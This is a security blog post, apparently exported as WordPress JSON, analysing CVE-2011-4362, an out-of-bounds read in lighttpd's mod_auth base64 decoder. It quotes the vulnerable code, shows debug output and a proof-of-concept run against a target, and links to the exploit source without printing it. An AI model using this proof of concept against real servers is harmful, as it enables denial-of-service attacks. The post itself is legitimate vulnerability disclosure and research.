29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that mod_auth for this server does not propely decode characters from the extended ASCII table. The vulnerable code is below:<\/p>\n
\"src\/http_auth.c:67\"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\u00a0\u00a0 \u00a0...\r\n\u00a0\u00a0 \u00a0int ch, ...;\r\n\u00a0\u00a0 \u00a0size_t i;\r\n\u00a0\u00a0 \u00a0...\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0ch = in[i];\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0...\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0ch = base64_reverse_table[ch];\r\n\u00a0\u00a0 \u00a0...\r\n}\r\n--- CUT ---<\/pre>\nBecause variable ‘in’ is type ‘char’, characters above 0x80 lead to negative indices. This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack). Unfortunately I couldn’t find any binaries where .rodata section before the base64_reverse_table table cause this situation.<\/p>\n
I have added some extra debug in the lighttpd source code to see if this vulnerability is executed correctly. Here is output for one of the example:<\/p>\n
--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116(\u00a0 | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100(\u00a0 | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75(\u00a0 | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59(\u00a0 | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55(\u00a0 | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36(\u00a0 | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---<\/pre>\nFirst column is the offset so vulnerability is executed like it should be (negative offsets). Second column is byte which is read out-of-bound.<\/p>\n
How to run this very primitive Proof of Concept?<\/p>\n
$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ .\/p_cve-2011-4362 \r\n\r\n\u00a0\u00a0 \u00a0...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n\u00a0\u00a0 \u00a0Usage: .\/p_cve-2011-4362 <options>\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0Options:\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -v <victim>\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -p <port>\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -d <remote_dir_for_auth>\r\n\r\n$ .\/p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\u00a0\u00a0 \u00a0...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Preparing arguments... OK\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Creating socket... OK\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Connecting to [127.0.0.1]... OK\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Sending dirty packet... OK\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0[+] Check the website!\r\n\r\n$<\/pre>\nLighttpd will log this situation probably in error-log file like this:<\/p>\n
--- CUT ---\r\n...\r\n...\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in \u00c7Yg\\\u00a7\u00ce\u00fan\u00f6Xt\u00be]rze\u00eb\u00db\u00f4\u00begY\u00f3\u00ef\\\u00f0\u00ffYb\u00eeY(\u00bfd\u00df\u00f8r\u00d6[Y\u00f3\u00fa\u00d9-\u00b7xi\u00fe\u00e8i\u00b0k\u00c2Wp\u00cb\u00a0\u00a0 \u00a0]\u07f6\u00f8\u00f2\\\u00e4\u00c2\u00d7@V\u00d8\u00e4\u00a6x\u00f3\u00fa\u00ddize\r\n--- CUT ---<\/pre>\nMaybe you can find vulnerable binary?<\/p>\n
Best regards,
\nAdam ‘pi3’ Zabrocki<\/p>\n
—
\nhttp:\/\/pi3.com.pl<\/a>
\nhttp:\/\/site.pi3.com.pl\/exp\/p_cve-2011-4362.c<\/a>
\nhttp:\/\/blog.pi3.com.pl\/?p=277<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that mod_auth for this server does not propely decode characters from the extended ASCII table. The vulnerable code is below: “src\/http_auth.c:67” — CUT — static const short base64_reverse_table[256] = …; static unsigned char * base64_decode(buffer *out, const […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4,5,6],"tags":[],"class_list":["post-277","post","type-post","status-publish","format-standard","hentry","category-bughunt","category-exploiting","category-ideas"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=277"}],"version-history":[{"count":14,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/277\/revisions"}],"predecessor-version":[{"id":290,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/277\/revisions\/290"}],"wp:attachment":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}